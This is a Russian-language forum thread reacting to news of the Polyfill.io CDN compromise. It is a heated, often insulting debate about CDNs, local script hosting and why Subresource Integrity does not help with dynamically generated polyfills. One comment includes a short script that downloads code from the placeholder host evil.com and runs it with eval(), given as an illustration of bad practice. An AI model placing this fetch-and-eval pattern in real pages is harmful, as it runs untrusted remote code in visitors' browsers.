Более 110 тысяч сайтов, использующих открытую JavaScript-библиотеку Polyfill для обеспечения совместимости со старыми версиями браузеров, стали жертвой вредоносных изменений, внесённых в код библиотеки новым владельцем проекта. В библиотеку, загружаемую на сайты через домен cdn.polyfill.io, был встроен вредоносный код, перенаправляющий пользователя на мошеннические сайты (например, googie-anaiytics.com), букмекерские конторы и online-казино...Подробнее: https://www.opennet.dev/opennews/art.shtml?num=61440
Почему нельзя было иметь локальную копию скрипта? Что за странная склонность всё подключать к чужим сайтам, репозиториям и тд?
С CDN грузится быстрее и кэшируется чаще.
Если ты не контролируешь, какой исполняется код - то г*****но ты, а не программист.
Да и скрипт не так нагружает систему, как всякие картинки по мегабайту.
А ведь есть ещё доля изюма в том что даже при занрузке с сидиэна (или откуда ещё угодно) можно контролировать это.
Но для этого надо быть не полностью безграмотной тупой мaкaкой и иметь хотя бы четверть извилины, а это уже сложно.Не будьте полностью безграмотными тупыми мaкaками, осильте прочитать и понять:
https://developer.mozilla.org/en-US/docs/Web/Security/Subres...
> Но для этого надо быть не полностью безграмотной тупой мaкaкойНу раз ты к таким не относишся, объясни, пожалуйста, как Subresource Integrity помог бы в данном случае? С учетом того, что юзеры использовали официальный Polyfill с официального сервака?
> Ну раз ты к таким не относишся, объясни, пожалуйстаОбъясняю:
> When a browser encounters a <script> or <link> element with an integrity attribute, before executing the script or before applying any stylesheet specified by the <link> element, the browser must first compare the script or stylesheet to the expected hash given in the integrity value. For subresource-integrity verification of a resource served from an origin other than the document in which it's embedded, browsers additionally check the resource using Cross-Origin Resource Sharing (CORS), to ensure the origin serving the resource allows it to be shared with the requesting origin.
> If the script or stylesheet doesn't match its associated integrity value, the browser must refuse to execute the script or apply the stylesheet, and must instead return a network error indicating that fetching of that script or stylesheet failed.
Чел, ты хоть сам понимаешь, что написано в этом тесте?Я тебе еще раз повторяю: это был официальный Polyfill с официального сервака, у котрого с origin и integrity все в порядке.
Зачем ты лезешь со своей экспертизой в темы, в которых ничего не понимаешь? Зато уже обозвал всех обезьянами с четвертью извилины...
Там есть контрольная сумма. Сумма поменялась - ресурс больше не загружается.
> Там есть контрольная сумма.PolyFill генерируется динамически на стороне CDN в зависимости от User-Agent браузера. Ты будешь перед выпуском в прод запускать свой локальный PolyFill, чтобы вычислить заранее контрольные суммы для сотни возможных враиантов сгенерированного скрипта и встроить их в каждую страницу сайта?
> Сумма поменялась - ресурс больше не загружается.
Да - и все пользователи твоего сайта автоматически идут лесом. Вне зависимости, был ли в либе бэкдор.
> сотни возможных враиантовУуу, это же десятки килобайт!
Слишком дорого, мы не можем себе этого позволить, наш сратап не выдержит такой финансовой нагрузки.> Да - и все пользователи твоего сайта автоматически идут лесом.
А с какого хера сидиэн может менять версию библиотеки без ведома владельца сайта?
С таким подходом можно сразу ключи от квартиры им отдать и завещание на них оформить.
> Ууу, это же десятки килобайт!Слишком дорого, мы не можем себе этого позволить, наш сратап не выдержит такой финансовой нагрузки.
При чем здесь финансовая нагрузка стартапа, если эти сотни хешей нужно вставлять в пользовательские страницы?
> А с какого хера сидиэн может менять версию библиотеки без ведома владельца сайта?
А он должен для этого получить письменное разрешение сотни тысяч пользователей, или что?
Я смотрю, тебе спорить - как с горы катиться. Вроде уже публично обделался со своей экспертизой по Subresource Integrity, но остановиться нести чушь так трудно, да?
> Чел, ты хоть сам понимаешь, что написано в этом тесте?Да, я понимаю что это такое и через какую ж♡пу оно работает.
А ещё я понимаю что в 2024 году оно нужно только сумасшедшим или м♡к♡к♡м.Для безопасной загрузки скриптов на сайтах со сторонних сидиэнов и прочих сервисов есть механизм.
Но загружать вот такое это всё равно что написать```
<script>
hmm = new XMLHttpRequest();
hmm.onreadystatechange = function() {
eval( hmm.responseText );
}
hmm.open("GET", "http://evil.com", true);
hmm.send();
</script>
```Написать можно и работать оно будет.
Но просто потому что что-то можно и будет работать, не значит что так надо делать.
> Для безопасной загрузки скриптов на сайтах со сторонних сидиэнов и прочих сервисов есть механизм.Ну так ты о нем расскажешь наконец? Ведь Subresource Integrty, про который ты только что с умным видом заливал, в этом случае бесполезен.
> Но загружать вот такое это всё равно что написать
Вау, смотрите, он может написать хэллоуворлд на js! Жаль, что смысла твоим умничаниям это не добавляет...
> это был официальный Polyfill с официального сервака, у котрого с origin и integrity все в порядке.Если твоя модель доверия сводится к количеству слов "официальный" в описании пакета, то чем ты лучше всех этих js-мартышек, которые грузят пакеты тысячами не парясь тем, что там грузится? Я тебе хоть тысячу слов "официальный" могу написать по поводу любого кода, и что, код от этого станет больше заслуживать доверия?
> Если твоя модель доверия сводитсяА я что-то говорил о *своей* модели доверия?
Раз уж ты сам себя за язык потянул, то поведай о модели доверия "не мартышек": расскажи, пожалуйста, как ты ставишь софт на свой комп.
> А я что-то говорил о *своей* модели доверия?Да, совершенно определённо. Ты так подчёркивал слова "официально" и с такой безнадёгой говорил о том, что им верить нельзя... определённо твоя модель доверия сводится к количеству слов "официальный" в описании.
> Раз уж ты сам себя за язык потянул, то поведай о модели доверия "не мартышек": расскажи, пожалуйста, как ты ставишь софт на свой комп.
Тебе надо выйти из подросткового возраста, понять что абсолютной истины либо не существует, либо она как правило недостижима для тебя, и почитать умных людей за последние пару тысяч лет, кто над этой проблемой ломал голову. Когда ты сформируешь у себя какое-то понимание истины, которое будет опираться не на финальные авторитеты, а на методы валидации/фальсификации потенциальных истин, вот тогда твой вопрос у тебя отвянет.
В целом, высшее образование как правило решает такие проблемы, и наделяет выпускников пониманием истины, которого достаточно в подавляющем большинстве ситуаций. Так что если самостоятельно копать нет желания или умения, ты можешь поступить в ВУЗ и закончить его. А если ты пойдёшь на IT специальность, то тебе там и азы безопасности расскажут, и тебе не надо будет даже самостоятельно конструировать применения философских идей об истинности к IT задачам. За тебя всё сделают, разжуют и в рот положат.
>> А я что-то говорил о *своей* модели доверия?
> Да, совершенно определённоНет, не говорил. Или ты, лжец, можешь привести соответствующую мою цитату?
>> Раз уж ты сам себя за язык потянул, то поведай о модели доверия "не мартышек": расскажи, пожалуйста, как ты ставишь софт на свой комп.
> Тебе надо выйти из подросткового возраста, понять что абсолютной истины либо не существует, либо она как правило недостижима для тебя, и почитать умных людей за последние пару тысяч лет, кто над этой проблемой ломал голову.Гсподи, чел, ты можешь просто ответить на заданный вопрос, а не пускать пыль в глаза?
> Нет, не говорил. Или ты, лжец, можешь привести соответствующую мою цитату?Зачем мне цитата? Я уже прочитал твои слова и понял их.
> Гсподи, чел, ты можешь просто ответить на заданный вопрос
Нет, сложные вопросы требуют сложных ответов. Если ты ждёшь, что я тебе здесь сейчас эссе накатаю на 40k слов, объясняя разные подходы к истине, сопутствующие матмодели, ограничения матмоделей и подходов, то ты глубоко заблуждаешься.
Ты б ещё попросил бы матан в трёх словах по-простому изложить.
> Я уже прочитал твои слова и понял ихНет, не понял, и поэтому приписываешь мне то, чего я не говорил. То есть лжешь.
>> Гсподи, чел, ты можешь просто ответить на заданный вопрос
> Нет, сложные вопросы требуют сложных ответов.
> Ты б ещё попросил бы матан в трёх словах по-простому изложить.Чувак, вопрос был "как ты ставишь софт на свой комп".
> Нет, не понял, и поэтому приписываешь мне то, чего я не говорил.Судя по качеству твоей аргументации в этом сообщении, я всё понял абсолютно правильно.
> Чувак, вопрос был "как ты ставишь софт на свой комп".
Какое это имеет отношение к данной новости? Ты в курсе, что модели угроз в случае софта дома и в случае подключения js-скрипта с левого сайта принципиально различаются?
Ты видишь? Ты каждым своим словом подтверждаешь мой изначальный диагноз.
>> Чувак, вопрос был "как ты ставишь софт на свой комп".
> Какое это имеет отношение к данной новости?Это имеет отношение к твоим домыслам о моей модели доверия и выводу, что я ничем не отличаюсь от "всех этих js-мартышек".
Твоя же отличается, правильно? Ты же не "js-мартышка"? Вот и расскажи о своей модели доверия.
> Ты в курсе, что модели угроз в случае софта дома и в случае подключения js-скрипта с левого сайта принципиально различаются?
Вот именно. Поэтому и интересно, какая модель доверия у такого знатного эксперта. Ну, чтобы ты своими словами - а не пылью в глаза - подтвердил уровень своей экапертизы.
> Ты видишь?
Я вижу, что ты все еще не ответил на простой вопрос и продолжаешь нелепо извиваться на сковороде.
> Это имеет отношение к твоим домыслам о моей модели доверия и выводу, что я ничем не отличаюсь от "всех этих js-мартышек".Если тебе эти мои "домыслы" причиняют такой баттхёрт, то это твои проблемы.
> Поэтому и интересно, какая модель доверия у такого знатного эксперта.
Зависит от модели угроз, я ж сказал уже.
> продолжаешь нелепо извиваться на сковороде.
Если ты не хочешь развивать своё мышление, то не надо валить ответственность за это на меня. Твоя лень -- это _твоя_ лень.
> Если тебе эти мои "домыслы" причиняют такой баттхёрт, то это твои проблемы.О чем ты, какой баттхерт? Я просто угораю с местного эксперта, у котрого просишь ответить на вопрос об установке софта, а он на серьезных начинает втирать про "разные подходы к истине, сопутствующие матмодели, ограничения матмоделей и подходов".
Я такой дичи в реальной жизни не втречал. Жги еще!
Так ты на вопрос ответишь?
> Зависит от модели угроз, я ж сказал уже.
Выбирай любую:
* PolyFill в браузере юзера.
* Нужно установить софт на комп.
> Выбирай любую:Ты не понял ещё, что я не собираюсь этого делать? Я не вижу смысла на пальцах объяснять азы человеку, который рассматривает слово "официальный" не как маркетинговый баззворд, а на полном серьёзе. Нет смысла, потому что писать тебе здесь 40k слов о том, что такое истина, как она устанавливается, что такое доверие и из чего оно складывается, какие модели угроз бывают, какие проблемы митигации этих угроз возникают, и какие инструменты есть для работы с разными угрозами.
Я на полном серьёзе тебе говорю: это требует высшего образования. Либо ты можешь попробовать в режиме самообучения, но будь готов к тому, что это займёт больше времени, чем 5 лет в ВУЗе.
> Нет смысла, потому что писать тебе здесь 40k слов о том, что такое истина, как она устанавливается, что такое доверие и из чего оно складывается, какие модели угроз бывают, какие проблемы митигации этих угроз возникают, и какие инструменты есть для работы с разными угрозами.Я у тебя спросил, как ты ставишь софт на свой комп. Какие к черту истина и доверие? С тобой все хорошо?
> Я на полном серьёзе тебе говорю: это требует высшего образования.
Подскажи, в каком институте так учат пускать пыль в глаза? Я тоже хочу научиться лить столько пафосной воды про истину и метамодели без какой-либо конкретики.
> Я у тебя спросил, как ты ставишь софт на свой комп.Я не вижу никаких причин тебе это рассказывать. В частности в силу вопросов безопасности. Есть такие понятия как "security through obscurity" и "неуловимый Джо", я полагаюсь на них в частности.
Так в собранном из github polyfill не было "дополнительного" кода,
он был только в версии которая грузилась с CDN.Поэтому посчитанная контрольная сумма для зависимости из github не сошлась бы с той что в CDN,
и браузер бы просто не скачал модифицированный polyfill.
> Так в собранном из github polyfill не было "дополнительного" кода,он был только в версии которая грузилась с CDN.
У тебя не было бы "собранного из github ployfill", потому что polyfill генерируется налету в зависимости от браузера. В лучшем случае ты мог бы запустить локальный polyfill и попытаться сгенерировать несколько сотен контрольных суммы для всех возможных комбинаций браузеров и их версий. А потом все это добро вставлять в каждую страницу сайта. И работать оно будет ровно до следующего обновлкния polyfill на cdn.
> Поэтому посчитанная контрольная сумма для зависимости из github не сошлась бы с той что в CDN,
и браузер бы просто не скачал модифицированный polyfill
Да, и при обновлении polyfill на cdn твой сайт отвалится у всех пользователей.
там динамически отдается полифил. это не статика. просто хеш не пропишешь.
идеальный вектор для атаки )
> там динамически отдается полифил. это не статика. просто хеш не пропишешь.
> идеальный вектор для атаки )Да, ССЗБ
Скажите, пожалуйста, какую марку микропроцессора Вы используете?
Так программист не исполняет код, исполняет код компьютер клиента. Это пользователь не контролирует какой код исполняется. Что конечно не снимает вину с программиста добавившего библиотеку. Это уже заведомо уязвимое место грузить любой не ваш исполняемый код из интернета, а js это исполняемый код.
Ещё раз напомню, что весь js исполняется на компьютере клиента, это тоже самое что скачать рандомный бинарник из интернета.
Виноваты в этом конечно веб-программисты, которые ничего не могут без js. Но это тоже самое как для просмотра сайта требовался бы бинарник, с той лишь разницей что js скачивается без спроса пользователя.
Действительно скрипт нагружает систему не так, а больше. Есть исследование килобайты скрипта грузит систему как 1MB картинки.В результате говоря адепты NoScript как всегда оказались правы.
> Если ты не контролируешь, какой исполняется код - то г*****но ты, а не программист.Сладкий хлебушек, елки. А потом - вот - продать оптом китайцам.
ты не поверишь, но нет, не быстрее, конечно сильно от региона будет зависить и твоего хостинга, но есть примеры когда CDN из своей перегруженности и направленности на массовость таки проигрывает датацентрам с хорошей сетьюнасчет контроля, есть такое понятие как hash функция
https://developer.mozilla.org/en-US/docs/Web/Security/Subres...
но ты светишь им клиента, даже если целостность файла подтверждена, приватность не пахнет в принципе
что решается уже самим клиентом с помощью Decentraleyes для тех кому надо
> насчет контроля, есть такое понятие как hash функцияПри чем здесь это, если использовался Polyfill с официального сайта? Контроль здесь может быть только в виде ревью нового кода глазками.
потому что все вышесказанное было в контексте"С CDN грузится быстрее и кэшируется чаще."
тема соответствия оригинального проекта и форка не трогалась в этой ветке
Тогда я не понял, к чему упомянут контроль.
потому что в той же ветке первый же ответ был"Если ты не контролируешь, какой исполняется код - то г*****но ты, а не программист. "
> тема соответствия оригинального проекта и форка не трогалась в этой ветке
> потому что в той же ветке первый же ответ был "Если ты не контролируешь...Ты же сам ответил на это "насчет контроля, есть такое понятие как hash функция" со ссылкой на Subresource Integrity, который буквально нужен для проверки соответствия кода.
ну так это же был не мой коментарий, мы сейчас про контекст говоримчто-то ты заблудился в трех березках
> ну так это же был не мой коментарий, мы сейчас про контекст говоримВот это не твой комментарий?
https://www.opennet.dev/openforum/vsluhforumID3/134114.html#61
> что-то ты заблудился в трех березках
Нет, это ты что-то прикидываешся валенком.
А нельзя версию в CDN зафиксировать по хэшу от контента?
Девопсня любит "оптимизировать". У них в религии четко прописано, что статику всегда надо держать в CDN, даже если заведомо известно, что сайтом будут пользоваться от силы полтора пользователя в день.
Чтобы не быть девопснёй, надо заставлять пользаков скачивать с сервера /dev/zero целиком.
Тогда никто не скажет, что сайт слишком "оптимизирован" и быстро грузится.
1. Прочитать js-файл из диска и отправить его по http -- быстрая операция:- если постоянно читать один и тот же файл из диска, ось его засовывает в кэш, а диск больше не трогает (кэш уровня ядра).
- нормальный веб-сервер позволяет явно прописать в конфиге, что файлы надо кэшировать в оперативке (кэш уровня веб-сервера).
- в большинстве случаев js-файлы не весят больше пары метров (вообще, пара метров -- это уже худший случай).2. Браузер на стороне клиента -- прикинь! -- не запрашивает js-файл каждый раз. Он его тоже кэширует. CDN незначительно ускорит лишь самую первую загрузку страницы: вместо 500ms страница откроется за 490ms. И стоило оно того? В обоих случаях (с CDN и без CDN) вторая и последующая загрузка страницы будет одинаковой, т. к. браузер достанет js из кэша.
CDN имеет смысл для видео и картинок. А также для js-файлов при условии, что это высокопопулярный ресурс уровня гугл.ком. Но девопсню вооружили CDN-молотком, и теперь они всюду видят гвозди.
А вы никогда не задумывались, как работает Интернет? Подскажу — там всё немного сложнее, чем при скачивании с подкроватного сервака. Динамическая маршрутизация, провайдеры первого яруса, метрики маршрутов и прочие девляпсовские термины.
На практике же это выливается, в частности, в то, на некоторых маршрутах RTT может достигать нескольких секунд. И без CDN это приведет к тому, что страница будет загружаться по полминуты (даже если грузить при 10 потоках одновременно), как во времена диалапа.
Не понимаю наезда на CDN.
Он прекрасно кеширует ресурсы сайта и не надо подключать сторонние репозитории для загрузки.
> на некоторых маршрутах RTT может достигать нескольких секундЕсли твой провайдер провайдит такие маршруты, никакой сидиэн тебе не поможет.
А у нормальных белых людей даже из сша в авсралию пинг не превышает пары сотен мс.
Ну да, точно, виноват провайдер пользователя. У которого всего 2-3 аплинка обычно.
> страница будет загружаться по полминутыНе называйте веб-страницей груду навоза из сотен js и css, генерируемую моднявым веб-фреймворком.
> 2. Браузер на стороне клиента -- прикинь! -- не запрашивает js-файл каждый разВ принципе, он так должен делать почти со всем контентом. Но... прикинь - НЕ ДЕЛАЕТ! Поставь промежуточный прокси и посмотри запросы - о%еешь, сколько всякой шняги загружается по сто раз!
Я даже де6илам из Оперы писал: посмотрите что творит ваш г***браузер - страница ПОЛНОСТЬЮ загружена, я говорю "Save As...", а браузер... правильно - СНОВА лезет за страницей и всем контентом на ней! Что за ватзефак?!!? Бестолку, там сидят такие 6араны, что хоть в спортлото пиши.
> - НЕ ДЕЛАЕТ!Хмм.
Ради интереса попробую форсировать отказы в загрузке на базе сессий.
> CDN незначительно ускорит лишь самую первую загрузку страницыили замедлит. Потому что не смотря на всякие зеротлс и прочие антитехнологические изобретения улучшаек - время на установку нового (!) шифрованного (!) соединения с новым сервером вовсе не нулевое.
А с твоим оно вот уже открыто, и скорее всего не одно. Ты даже и не заметишь что там еще сотня файлов по паре мегабайтиков пролетит.
Особенно - на фоне тупежа браузера, пытающегося все эти мегабайты кода выполнить на ходу.
> CDN имеет смысл для видео и картинок.
тоже нет. Если ты не собираешься конечно косплеить гугль или твиттер.
Ну разьве что у тебя совсем уж подкроватный сервер на модеме 14400.
Единичное видео откроется напрямую с него быстрее чем с CDN (опять же потому что до cdn еще достучаться надо). А постоянная скорость его отдачи превышающая битрейт все равно никому не нужна. Как и миллион одновременных скачиваний - ты не звезда онлифанс, к сожалению.
Вот для одноразовых инстансов в дядиных "облачках" - имеет смысл, чтоб дяде за траффик не заплатить (или поменьше, чем первому, если cdn "свой", в смысле арендованный а не чужого дяди вообще, в любом количестве и бесплатно)
> Но девопсню вооружили CDN-молотком, и теперь они всюду видят гвозди.
просто они не видят куда в "веб-приложению" совать картинки и скрипты. А если их попросить это сделать - немедленно обратятся к фулшмяк девам, и те им накодят на сервере - запрос к орацлу, из которого поднимется блобик, а на клиенте запрос к апи, который этот сервер обработает.
Ну в крайнем случае, если сильно-сильно продвинутые - то не в орацл, а в s3. AWSовский конечно, какой же еще может быть s3! И пусть весь мир подождет.Лучше уж пусть CDN используют, меньше будет угрозы глобального потепления.
> Потому что не смотря на всякие зеротлс и прочие антитехнологические изобретения улучшаек - время на установку нового (!) шифрованного (!) соединения с новым сервером вовсе не нулевое.50-100 ms.
> А с твоим оно вот уже открыто, и скорее всего не одно. Ты даже и не заметишь что там еще сотня файлов по паре мегабайтиков пролетит.
1000-5000 ms.
Главное — не замечать того, что партия сказала не замечать.
> 1000-5000 ms.чувак, не хотелось бы огорчать, но у твоего подкроватного сервера, похоже, кот съел тот древний модем 2400, через который он был подключен. Сочувствую, хз где ты новый возьмешь теперь.
5 секунд (СЕКУНД) это у тех модемов хэндшейк столько примерно был.
А HTTP GET внутри уже открытого соединения немножко побыстрее происходит.> Главное — не замечать того, что партия сказала не замечать.
главное не выдавать свои глюки за прописные истины.
И нет, rtt до клаудшмары у меня не 50ms. Это хороший rtt до операторского ближайшего роутера, и то если повезло.
>> 1000-5000 ms.
> чувак, не хотелось бы огорчать, но у твоего подкроватного сервера, похоже, кот
> съел тот древний модем 2400, через который он был подключен. Сочувствую,
> хз где ты новый возьмешь теперь.
> 5 секунд (СЕКУНД) это у тех модемов хэндшейк столько примерно был.
> А HTTP GET внутри уже открытого соединения немножко побыстрее происходит.Что-то мне вспомнилось удивлённое лицо сантехника, который мне пел про СНиПы и "всё нормально", я а его "вгрузил" формулой "два пи эр" и заставил всё переделать, поскольку он посчитать не смог, сколько по трубе воды проходит. Но то сантехник и геометрия с физикой, а тут вроде айтишник и деление... ппц. Знать бы, куда таких на работу берут.
> А с твоим оно вот уже открыто, и скорее всего не одно. Ты даже и не заметишь что там еще сотня файлов по паре мегабайтиков пролетит.То есть, открыть новое соединение - это быстрее, чем загрузить пару мегабайт? Причем соединение с серваком CDN, который рядом, а не на другом конце земного шара?
Я смотрю, ты мастер альтернативных мнений.
> То есть, открыть новое соединение - это быстрее, чем загрузить пару мегабайт?именно что нет, не быстрее. Даже если все уже закэшировано, а не "начнем с dns запроса..." Причем пару (сотен) мегабайт потом все равно придется загрузить. И узким местом там будет клиентский канал (а потом клиентский браузер, которому весь этот кот исполнять).
> Причем соединение с серваком CDN, который рядом, а не на другом
он не рядом. Тебя нае...ли.
> конце земного шара?
часто ты заходишь на сервер на другом конце земного шара? Причем содержащий, видимо, ровно ничего - все ж отдается с cdn.
>> То есть, открыть новое соединение - это быстрее, чем загрузить пару мегабайт?именно что нет, не быстрее.
> именно что нет, не быстрееТы только что выше писал буквально обратное. С тобой все хорошо?
> он не рядом. Тебя нае...ли.
Ну, тебе виднее. Главное, что тебя не проведешь.
> часто ты заходишь на сервер на другом конце земного шара?
> все ж отдается с cdn.Ты уж определись, быстрее с CDN или медленее.
Для ответа на этот вопрос загуглите что такое CDN.
У тех, кому нужен CDN для статики, он есть свой (ну то есть арендованный, вероятно, но полностью контролируемый). На фига грузить с чужого?
Ну, сейчас примерно половина сайтов гоняет JS через jsdelivr. Пользователю быстрее загрузка страницы, владельцу сайта меньше платить за трафик.
Но ведь за трафик все равно кому-то придётся платить.В данном случае, платит владелец jsdeliver, и наверняка платит немало. А ему какая с этого выгода?
Сейчас трафик стоит копейки.
в калоклаудах стоит минимум 2 цента в пиринговые сети за 1 гб (и 5 центов в остальные), ну посчитай во что тебе выльется 1 гигабитный аплинк за месяця конечно понимаю, что врядли он облаччные это деливр, но не надо говорить, что трафик копеечный, смотря у кого, ну и все равно не то чтобы почти даром
> в калоклаудах стоит минимум 2 цента в пиринговые сети за 1 гб
> (и 5 центов в остальные), ну посчитай во что тебе выльется
> 1 гигабитный аплинк за месяцЗачем так жёстко? Тут народ миллисекунды в секунды перевести не может, надо быть толерантнее.
> Но ведь за трафик все равно кому-то придётся платить.
> В данном случае, платит владелец jsdeliver, и наверняка платит немало. А ему
> какая с этого выгода?Массовая слежка за тем кто куда ходит, продают страховщикам, рекламным агентствам и правительствам.
> У тех, кому нужен CDN для статики, он есть свойЛол. Не каждый крупный бизнес может себе позволить свой CDN, а про средний и мелкий вообще думать смешно.
На самом деле, настроить pdns + geoip backend и десяток vrrp-пар варнишей в разных ДЦ не так уж сложно и дорого.Другое дело — далеко не все понимают коммерческую значимость скорости загрузки сайта. Вот выше толпа "одминов" в свитерах с аленями™ думает, что CDN — бесполезная выдумка девляпсов®.
> На самом деле, настроить pdns + geoip backend и десяток vrrp-пар варнишей
> в разных ДЦ не так уж сложно и дорого.но совершенно неэффективно.
Скорее всего будет даже медленнее во многих случаях. География и ip сети немного разные вещи.
Да и сколько тех разных ты сможешь себе позволить (напоминаю - в них не "vrrp" должно быть, а файлики лежать физически)> Другое дело — далеко не все понимают коммерческую значимость скорости загрузки сайта.
Потому что это сказки.
Никто, ни один юзверь не уйдет с твоего сайта на другой потому что он на целых 0,1 секунды медленнее загружается.Если ты конечно не мастер дорвеев и одноразовой рекламы.
> Потому что это сказки.
> Никто, ни один юзверь не уйдет с твоего сайта на другой потому
> что он на целых 0,1 секунды медленнее загружается.Пруф: при наборе "тормозит сайт" поисковик подставляет:
Ютуб
магазин из 3-х букв (и заменяет "тормозит" на "лагает"!)
одноглазники
другой магазин-барахолку
сайт транспортной компании-монополиста
ещё один магазин
ещё один магазин
...
э... ну... эта... ты б не палился так. Все же "Поисковик" для каждого - свой.Разумеется ютуб я тоже смотрю, но одноглазики - брр... это какой-то самодонос у тебя получился.
Но в целом да, суть правильна - ХРЕН ты куда с этих сайтов денешься.
Пузыри имеют свойство лопаться.) Одноглазики весьма настойчиво суёт, да. Наверное, очень хотят меня там видеть.
> коммерческую значимость скорости загрузки сайтаДля обеспечения необходимой скорости загрузки сайта в ситуации, когда она коммерчески значима, надо не на CDN деньги тратить, а вызвать сотрудника, ответственного за сайт и за скорость его загрузки, загрузить при нём "/" при нажатой F12, и спросить, какого х@я для простейшей странички грузятся стопиццот файлов js и css, после чего высечь розгам и и вышвырнуть с волчьим билетом.
Так что - хорошая попытка, отдел маркетинга CDN-провайдера, но нет.
> На самом деле, настроить pdns + geoip backend и десяток vrrp-пар варнишей
> в разных ДЦ не так уж сложно и дорого.
> Другое дело — далеко не все понимают коммерческую значимость скорости загрузки сайта.
> Вот выше толпа "одминов" в свитерах с аленями™ думает, что CDN
> — бесполезная выдумка девляпсов®.так он и не нужен, кто мешает тебе сделать сайт доступный в разных географических регионах? почему ты вперся в CDN? ))) притом чаще всего тормознуто и дорого если от гипескейлеров всяких и отдавать будет только статику
> так он и не нужен, кто мешает тебе сделать сайт доступный в разных географических регионах?Чел, ты прежде чем умничать хотя бы узнал, что такое пинг и от чего он зависит.
>> так он и не нужен, кто мешает тебе сделать сайт доступный в разных географических регионах?
> Чел, ты прежде чем умничать хотя бы узнал, что такое пинг
> и от чего он зависит.чел ты если ничерта не понимаешь, что говоришь, иди почитай про anycast и потом мне сказки рассказывай про сферический пинг в вакууме, когда тебе edge роутер на твой пинг ответит, а не твой хост
вот откуда вы "всезнающие" лезете? ну убирали бы свои дворы, максимум было бы грязно вокруг
> почему ты вперся в CDN?
> иди почитай про anycastЭто фантастика: недоумевать, зачем нужен CDN и тут же советовать почитать про anycast, который лежит в его основе.
>> почему ты вперся в CDN?
>> иди почитай про anycast
> Это фантастика: недоумевать, зачем нужен CDN и тут же советовать почитать про
> anycast, который лежит в его основе.ты совсем тугой? тебе же сказали что можно географически разнести само приложение, а не только статику из CDN
и нет anycast не лежит в основе CDN, в частности в Akamai это обычный geo DNS
я ж говорю не лезь со своим чуркадевелопмент инкорпорейтед
Там обычно только основной скрипт на 10 метров, если они ещё и доп либы к себе положат то сайт будет пол часа прогружаться.
И шрифтов на 5-10 метров. Зачем-то. Непонятно зачем.
> И шрифтов на 5-10 метров. Зачем-то. Непонятно зачем.С шрифтами красивее.
Загружаются они быстро и всего один раз, работу не замедляют, сложностей никаких не добавляют, а красота остаётся навсегда.
> Загружаются они быстроКаждый в отдельности, на фоне остального хлама - да, не очень долго. Ну, добавит каждый свои несколько секунд в общее время загрузки страницы.
> всего один разЭто если заголовки правильно выставлены. А зачем хозяину ЦДНа позволять твоему броузеру кэшировать фонт? Ведь тогда при следующем твоём посещении этого сайта он не получит реквеста с реферером и печенькой, и не сможет записать в своих логах, с каких страниц твой броузер обратщался за фонтом. Что он тогда продавать будет?
Плюсую. Увы, некоторых жизнь ничему не учит. Это не первый случай, и, к сожалению не последний.
Обычно жизнь учит, что на коммерческих проектах подключение CDN улучшает UX и повышает конверсию.
> Деме́нция (лат. dementia — безумие) — приобретённое слабоумие, стойкое снижение познавательной деятельности с утратой в той или иной степени ранее усвоенных знаний и практических навыков и затруднением или невозможностью приобретения новых.
А потом ой у нас сайт увели, пользователи на онлайн казино кидает и другой зловред, но зато на 0,5% стало больше псевдографики в табличке.
Конверсию повышает кислородное дутьё, а не вот это вот.
В тексте новости написано, почему в данном конкретном случае это удобно.
> Polyfill динамически оценивает текущий браузер по заголовку User Agent и для устаревших браузеров генерирует функции с реализацией недостающих методов, свойств и APIЭто не статика, а сервис, который динамически выдаёт специфичные для определённого браузера полифиллы. Можно конечно и у себя захостить, но Fastly или Cloudflare использует половина интернета, ещё и бесплатно.
Что мешает отдать статический файл и уже на стороне клиента определить нужные функции?
> Что мешает отдать статический файл и уже на стороне клиента определить нужные функции?Скорость загрузки всего кода вместо необходимой части (или вообще ничего, если браузер последней версии).
> Почему нельзя было иметь локальную копию скрипта? Что за странная склонность всё подключать к чужим сайтам, репозиториям и тд?Вебня, она такая вебня.
Потому что веб м4к4ки)
Вообще: "в современных реалиях потребности в Polyfill больше нет, так как все основные браузеры в должной мере поддерживают Web API".
НУ и стоило на версию cloudflare давно переходить.А в целом, делать апдейт до прочтения чейнджлога и тестов? - Мое почтение, добро пожаловать в печь, унтерменшен.
если вдруг кто ещё не знает: https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/
Если вдруг кто не понимает:
https://git.synz.io/Synzvato/decentraleyes/-/tree/master/res...
вот тут лежит ПОЛНЫЙ список давно никем не используемых и сто лет не обновляющихся жабоскриптовых либ, которые (и ТОЛЬКО их, и только вот этих конкретных версий) эта поделка подменяет на ходу.Полифилов там нет, потому что это не совсем либа, и к тому же их так просто подменить не выйдет.
Добавить самостоятельно что-то свое при этом нельзя, даже если это что-то тривиальное. Автор не предусмотрел. Только разбирать пакет и собирать свой с добавленным единичным ресурсом, и так каждый раз.
Идея была не то чтоб хороша но как-то приемлема лет десять назад.
> Почему нельзя было иметь локальную копию скрипта? Что за странная склонность всё подключать к чужим сайтам, репозиториям и тд?Почему нельзя читать новость не пятой точкой?
> Polyfill динамически оценивает текущий браузер по заголовку User Agent и для устаревших браузеров генерирует функции с реализацией недостающих методов, свойств и API
Это не статичная библиотека, а сервис.
А у твоего сервака 100% меньше мощностей, чем у CDN, чтобы хостить свою варсию.
А его серваку и не надо снабжать ей весь мир. На его полтора клиента - мощностей вполне хватит (основной контент как-то ведь отдает, и может даже - динамический, а не полтора скриптика)Но некому поднять и обслуживать.
> А его серваку и не надо [...] На его полтора клиентаТы вообще о ком? И окуда заранее знаешь, что ему надо и сколько у него клиентов?
>> А его серваку и не надо [...] На его полтора клиента
> Ты вообще о ком? И окуда заранее знаешь, что ему надо и
> сколько у него клиентов?Оттуда же, откуда ты знаешь "А у твоего сервака 100% меньше мощностей, чем у CDN, чтобы хостить свою варсию."
> Оттуда же, откуда ты знаешь "А у твоего сервака 100% меньше мощностей, чем у CDN, чтобы хостить свою варсию."Кто бы мог подумать, что один сервер слабее, чем сотня серверов раскиданых по всему земному шару.
Опеннетная логика как всегда пробивает дно.
дак вам и намекают, что у одного сайта посетителей больше чем в сотню раз меньше, чем у сервиса, которым весь мир пользуется.
>> Оттуда же, откуда ты знаешь "А у твоего сервака 100% меньше мощностей, чем у CDN, чтобы хостить свою варсию."
> Кто бы мог подумать, что один сервер слабее, чем сотня серверов раскиданых
> по всему земному шару.
> Опеннетная логика как всегда пробивает дно.Да где тут логика? У тебя есть данные по его серваку? Нет. Ты даже считать не умеешь: "100% меньше мощностей" даёт в результате 0. Зато выводы делать горазд. И на предположения оппонента сразу же удивляешься, откуда он взял цифры. Точно так же придумал, при этом у него явно больше опыта.
